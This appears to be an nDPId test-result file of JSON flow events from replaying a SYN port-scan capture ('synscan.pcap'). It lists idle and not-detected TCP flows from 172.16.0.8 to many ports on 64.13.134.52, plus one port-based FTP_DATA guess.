+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32781,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49167,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49167,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32785,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32785,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
